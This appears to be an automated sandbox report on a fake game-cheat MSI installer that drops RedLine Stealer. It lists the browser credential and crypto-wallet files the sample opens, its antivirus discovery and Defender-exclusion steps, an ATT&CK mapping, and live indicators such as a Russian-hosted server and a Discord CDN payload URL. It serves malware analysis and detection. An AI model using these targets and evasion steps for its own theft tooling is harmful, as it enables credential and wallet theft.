                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_006035A9 cpuid 5_2_006035A9
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_006037D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_006037D5
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_00617B1F GetTimeZoneInformation,5_2_00617B1F
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: connect.exe, 00000016.00000003.2391011973.0000000007B9C000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2391011973.0000000007BD6000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2390918041.0000000009533000.00000004.00000020.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2414865574.0000000007B9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 22.2.connect.exe.21f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.connect.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.2400212842.00000000021F2000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.2399412192.0000000000425000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: connect.exe PID: 7816, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\walletsLRkqTV
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $kq1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $kq-cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.walletLRkq
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLRkq
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.walletLRkq
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLRkq
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $kq5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: Yara matchFile source: 00000016.00000002.2401674752.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: connect.exe PID: 7816, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 22.2.connect.exe.21f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.connect.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.2400212842.00000000021F2000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.2399412192.0000000000425000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: connect.exe PID: 7816, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    1
                    Replication Through Removable Media                    		221
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		1
                    Replication Through Removable Media                    		1
                    Archive Collected Data                    		Exfiltration Over Other Network Medium1
                    Ingress Tool Transfer                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Scripting                    		1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory11
                    Peripheral Device Discovery                    		Remote Desktop Protocol3
                    Data from Local System                    		Exfiltration Over Bluetooth11
                    Encrypted Channel                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts3
                    Native API                    		1
                    Registry Run Keys / Startup Folder                    		11
                    Process Injection                    		1
                    Scripting                    		Security Account Manager2
                    File and Directory Discovery                    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                    Non-Standard Port                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local Accounts1
                    Scheduled Task/Job                    		Logon Script (Mac)1
                    Scheduled Task/Job                    		2
                    Obfuscated Files or Information                    		NTDS135
                    System Information Discovery                    		Distributed Component Object ModelInput CaptureScheduled Transfer2
                    Non-Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud Accounts1
                    PowerShell                    		Network Logon Script1
                    Registry Run Keys / Startup Folder                    		1
                    DLL Side-Loading                    		LSA Secrets351
                    Security Software Discovery                    		SSHKeyloggingData Transfer Size Limits13
                    Application Layer Protocol                    		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    File Deletion                    		Cached Domain Credentials331
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items123
                    Masquerading                    		DCSync2
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job331
                    Virtualization/Sandbox Evasion                    		Proc Filesystem1
                    Application Window Discovery                    		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    System Network Configuration Discovery                    		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1337011 Sample: Cheat.Lab.2.7.1.msi Startdate: 04/11/2023 Architecture: WINDOWS Score: 76 69 ip-api.com 2->69 71 cdn.discordapp.com 2->71 81 Snort IDS alert for network traffic 2->81 83 Multi AV Scanner detection for domain / URL 2->83 85 Found malware configuration 2->85 87 6 other signatures 2->87 9 msiexec.exe 14 37 2->9         started        13 LuaJIT.exe 2 35 2->13         started        16 msiexec.exe 15 2->16         started        18 3 other processes 2->18 signatures3 process4 dnsIp5 51 C:\Windows\Installer\MSIFEEB.tmp, PE32 9->51 dropped 53 C:\Windows\Installer\MSIF5A3.tmp, PE32 9->53 dropped 55 C:\Windows\Installer\MSIF4F6.tmp, PE32 9->55 dropped 63 5 other malicious files 9->63 dropped 103 Drops executables to the windows directory (C:\Windows) and starts them 9->103 20 MSIF5A3.tmp 1 9->20         started        22 msiexec.exe 1 9->22         started        25 msiexec.exe 9->25         started        27 msiexec.exe 2 9->27         started        73 193.37.71.112, 49731, 80 VAD-SRL-AS1MD Russian Federation 13->73 75 ip-api.com 208.95.112.1, 49729, 80 TUT-ASUS United States 13->75 77 cdn.discordapp.com 162.159.129.233, 443, 49737, 49738 CLOUDFLARENETUS United States 13->77 57 C:\Users\user\AppData\Roaming\...\connect.exe, PE32 13->57 dropped 65 2 other malicious files 13->65 dropped 29 connect.exe 8 6 13->29         started        32 schtasks.exe 1 13->32         started        34 schtasks.exe 1 13->34         started        59 C:\Users\user\AppData\Local\...\MSID626.tmp, PE32 16->59 dropped 61 C:\Users\user\AppData\Local\...\MSID605.tmp, PE32 16->61 dropped 67 8 other malicious files 16->67 dropped file6 signatures7 process8 dnsIp9 36 cmd.exe 1 20->36         started        93 Query firmware table information (likely to detect VMs) 22->93 39 LuaJIT.exe 22->39         started        79 91.103.252.8, 29975, 49740 HOSTGLOBALPLUS-ASRU Russian Federation 29->79 95 Antivirus detection for dropped file 29->95 97 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 29->97 99 Found many strings related to Crypto-Wallets (likely being stolen) 29->99 101 3 other signatures 29->101 41 conhost.exe 29->41         started        43 conhost.exe 32->43         started        45 conhost.exe 34->45         started        signatures10 process11 signatures12 89 Suspicious powershell command line found 36->89 91 Adds a directory exclusion to Windows Defender 36->91 47 powershell.exe 23 36->47         started        49 conhost.exe 36->49         started        process13

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Cheat.Lab.2.7.1.msi0%ReversingLabs
                    Cheat.Lab.2.7.1.msi0%VirustotalBrowse

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe100%AviraTR/Crypt.OPACK.Gen
                    C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe0%ReversingLabs
                    C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe3%VirustotalBrowse
                    C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe0%ReversingLabs
                    C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe3%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\MSI8FE.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSI8FE.tmp0%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\MSI91F.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSI91F.tmp0%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\MSID42B.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSID42B.tmp0%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\MSID4A9.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSID4A9.tmp0%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\MSID4C9.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSID4C9.tmp0%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\MSID4E9.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSID4E9.tmp0%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\MSID538.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSID538.tmp0%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\MSID5C6.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSID5C6.tmp0%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\MSID605.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSID605.tmp0%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\MSID626.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSID626.tmp0%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                    https://api.ip.sb/ip0%URL Reputationsafe
                    http://ocsp.sectigo.com00%URL Reputationsafe
                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                    http://www.w3.o0%URL Reputationsafe
                    https://sectigo.com/CPS00%URL Reputationsafe
                    http://tempuri.org/Contract/MSValue2Response0%Avira URL Cloudsafe
                    http://tempuri.org/0%Avira URL Cloudsafe
                    http://tempuri.org/Contract/MSValue3ResponseD0%Avira URL Cloudsafe
                    https://luajit.org/1%VirustotalBrowse
                    91.103.252.8:2997516%VirustotalBrowse
                    http://tempuri.org/1%VirustotalBrowse
                    http://tempuri.org/Contract/MSValue3ResponseD2%VirustotalBrowse
                    http://tempuri.org/Contract/MSValue3Response0%Avira URL Cloudsafe
                    91.103.252.8:29975100%Avira URL Cloudmalware
                    https://luajit.org/0%Avira URL Cloudsafe
                    http://tempuri.org/Contract/MSValue2ResponseD0%Avira URL Cloudsafe
                    http://tempuri.org/Contract/MSValue10%Avira URL Cloudsafe
                    http://tempuri.org/Contract/MSValue20%Avira URL Cloudsafe
                    http://tempuri.org/Contract/MSValue30%Avira URL Cloudsafe
                    http://tempuri.org/D0%Avira URL Cloudsafe
                    http://tempuri.org/Contract/MSValue3Response2%VirustotalBrowse
                    http://tempuri.org/Contract/MSValue2ResponseD2%VirustotalBrowse
                    http://tempuri.org/Contract/MSValue31%VirustotalBrowse
                    http://tempuri.org/D1%VirustotalBrowse
                    http://tempuri.org/Contract/MSValue2Response2%VirustotalBrowse
                    http://tempuri.org/Contract/MSValue24%VirustotalBrowse
                    http://tempuri.org/Contract/MSValue11%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    cdn.discordapp.com
                    		162.159.129.233
                    		truefalse
                      		high
                      ip-api.com
                      		208.95.112.1
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txtfalse
                          		high
                          91.103.252.8:29975true
                          • 16%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          http://ip-api.com/json/?fields=query,status,countryCode,city,timezonefalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Textconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/02/sc/sctconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/chrome_newtabconnect.exe, 00000016.00000002.2403851967.000000000437C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004409000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004262000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004147000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=connect.exe, 00000016.00000002.2403851967.0000000004246000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000412C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000437C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004360000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004409000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004262000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004147000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0connect.exe.9.drfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://tempuri.org/Contract/MSValue3ResponseDconnect.exe, 00000016.00000002.2401674752.0000000002926000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 2%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://tempuri.org/Contract/MSValue2Responseconnect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 2%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://tempuri.org/connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 1%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrapconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepareconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issueconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://luajit.org/LuaJIT.exe.1.drfalse
                                                      • 1%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Abortedconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceconnect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/faultconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsatconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renewconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/Registerconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://api.ip.sb/ipconnect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2004/04/scconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
